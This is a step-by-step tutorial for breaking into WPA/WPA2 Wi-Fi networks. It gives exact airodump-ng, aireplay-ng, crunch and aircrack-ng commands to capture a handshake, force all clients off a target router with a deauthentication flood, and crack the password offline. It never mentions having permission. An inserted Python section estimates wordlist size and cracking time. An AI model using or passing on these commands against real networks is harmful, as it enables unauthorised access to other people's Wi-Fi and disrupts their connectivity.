WPA is the most common Wi-Fi security that we use today. Its algorithm is secure enough, but you can still hack it.
In this technique there is nothing new: the same software, Aircrack-ng and crunch, just with the commands modified in the right way.
And you don't have to wait until a client joins that network. I will show you how to disconnect the client from the router.
Warning: For VMware or VirtualBox you have to buy a wireless adapter, but I do not recommend hacking Wi-Fi from VMware or VirtualBox because you need a lot of power. Anyway, check the tutorial.
Ignore the above warning if you did not understand it.
I have divided the tutorial into 2 parts. Part 2 can be done from your home, but for part 1 you need the Wi-Fi signal.
Part 1: Capturing WPA Handshake
What is a WPA handshake?
Before reading this post, many of you have tried to guess a Wi-Fi password. Suppose you could guess passwords without any signal. A WPA handshake file lets you do that. In other words, it is a capture from a particular wireless network against which you can try passwords without being in range. One more thing: the system will guess passwords at a speed of 1000 w/s (words per second) or more, depending on your hardware.
Let's Start
The first step is killing your internet. It is important. Here is the command.
ifconfig wlan0 down
The next step enables monitor mode.
iwconfig wlan0 mode monitor
The above command enables monitor mode. You have to enable monitor mode. Monitor mode is used to see information about the Wi-Fi networks that are in our range. Monitor mode is also needed for disconnecting the client from the network (read the full post and you will understand what I am talking about).
After that, you need to kill (stop) some processes on your computer.
airmon-ng check kill
It kills all the processes that can cause a problem in Wi-Fi hacking, for example NetworkManager. All of us enable auto-connect to our network; for hacking it causes a problem, so you have to stop this process.
After that, you can see all available networks (depending on your wireless card's range). To do this, run the following command.
airodump-ng wlan0
It shows all networks with a lot of information. It will keep running until you stop it.
Press ctrl+c to stop it (ctrl+z would only suspend it, not stop it).
The next step is important: see everything about your target network. BSSID is the MAC address, ESSID is the name of the network, and ENC shows the security the network uses. Before going ahead, make sure it is WPA or WPA2. CH shows the channel number.
Depending upon your target you have to change the channel number. In my case it is eight; look at the screenshot above. The commands below use channel 1 as the example, so put your target's channel in its place.
iwconfig wlan0 channel 1
Your adapter's channel changes from whatever it was to 1. Using the following command you can capture the WPA handshake.
airodump-ng -c 1 --bssid 04:95:E6:52:A2:E8 -w xd wlan0
Here -c is the channel number and --bssid is the MAC address of the target network. -w is the file prefix where we want to save the handshake, here with the name xd.
This will try to capture the handshake, meaning it waits until somebody joins the Wi-Fi (which makes no sense to wait for). But you don't need to wait. Open a new terminal and run aireplay-ng -0 0 -a <bssid here>. Here is the full command.
aireplay-ng -0 0 -a 04:95:E6:52:A2:E8 wlan0
It launches a DoS attack on the router, so all connected devices (clients) are disconnected. When any device is disconnected and rejoins the router, you will see "WPA handshake" captured in the previous terminal.
When the handshake is captured, press ctrl+c to stop aireplay-ng. It is important to stop it, because it cuts off the Wi-Fi's internet.
As you see, I have uploaded a screenshot of both terminals. You can see the WPA handshake is captured, so there is no more need for the second terminal.
Now part 1 is complete; go back to your home. To confirm, type
ls and check whether there is a file with the name xd-01.cap. Here is the screenshot.
-----------------------------------------------
Part 2: Password Cracking
Now relax, because the next steps are a bit different from the above commands.
Now you can go back to your home, because the next steps can be done from anywhere in the world.
We have captured the WPA handshake, but now we have to crack it using a wordlist attack.
If you already know this, great. We will create the wordlist text file using crunch.
Command to create the wordlist:
crunch <min> <max> <characters> -o <filename to save results>
Example
crunch 8 10 abcdehil@#12345678 -o pass.txt
It creates a wordlist where the minimum length is 8 and the maximum length is 10, using those characters. All the words are saved in the pass.txt file.
Read: How to make a powerful wordlist using crunch.
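Before running crunch it is worth knowing how big the wordlist will be and how long aircrack-ng would need to get through it. The following is an added example for this page (not crunch's or aircrack-ng's code): it counts the candidates a crunch-style charset and length range produce, the bytes they take on disk, and the worst-case time at a given guessing rate. It assumes the charset contains distinct characters and that every word is written with a trailing newline; the rate of 1000 w/s is the figure quoted earlier on this page.

```python
"""Size and time estimates for a crunch-style wordlist attack."""


def keyspace_size(charset, min_len, max_len):
    """Number of words crunch emits for charset over lengths min_len..max_len.

    Assumes the characters in charset are distinct (duplicates inflate the count).
    """
    n = len(charset)
    return sum(n ** length for length in range(min_len, max_len + 1))


def wordlist_bytes(charset, min_len, max_len):
    """On-disk size of that wordlist, assuming one word per line plus a newline."""
    n = len(charset)
    return sum(n ** length * (length + 1) for length in range(min_len, max_len + 1))


def time_to_exhaust(words, rate_per_second):
    """Worst-case seconds to try every word at the given guessing rate."""
    return words / rate_per_second


def human_seconds(seconds):
    year, day, hour = 365 * 86400, 86400, 3600
    if seconds >= year:
        return f"{seconds / year:.1f} years"
    if seconds >= day:
        return f"{seconds / day:.1f} days"
    if seconds >= hour:
        return f"{seconds / hour:.1f} hours"
    return f"{seconds:.0f} seconds"


def human_bytes(n):
    for unit in ("B", "KiB", "MiB", "GiB", "TiB"):
        if n < 1024 or unit == "TiB":
            return f"{n:.1f} {unit}"
        n /= 1024


def report(charset, min_len, max_len, rate_per_second):
    """Summarise a planned wordlist; returns (words, bytes, seconds) for further use."""
    words = keyspace_size(charset, min_len, max_len)
    size = wordlist_bytes(charset, min_len, max_len)
    secs = time_to_exhaust(words, rate_per_second)
    print(f"charset of {len(charset)} chars, lengths {min_len}-{max_len}: "
          f"{words:,} words, {human_bytes(size)} on disk, "
          f"up to {human_seconds(secs)} at {rate_per_second:,} w/s")
    return words, size, secs


if __name__ == "__main__":
    # The page's own crunch example, at the 1000 w/s quoted in part 1.
    report("abcdehil@#12345678", 8, 10, 1000)
    # A short list for comparison: 4 digits at the same rate finishes in seconds.
    report("0123456789", 4, 4, 1000)
```

The first report shows why the page's example is not something you can actually run to completion: the 18-character set over lengths 8 to 10 yields several trillion candidates, which at 1000 w/s is more than a century of work and tens of terabytes of disk. The same arithmetic is the defender's argument for long random passphrases: every extra character multiplies the keyspace by the charset size, and an attacker holding the handshake file has only this offline search to work with.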
Now open a terminal and run this command:
aircrack-ng -w pass.txt xd-01.cap
For aircrack-ng, -w is the path to the wordlist text file and xd-01.cap is the handshake file.
It tries every word in pass.txt as the password. If the password is in the file, it shows you something like this. Now you can see the password is successfully cracked.
Tips to make the cracking process faster:
- Close unnecessary programs; it makes the process faster.
- Use more than one computer with different wordlist files.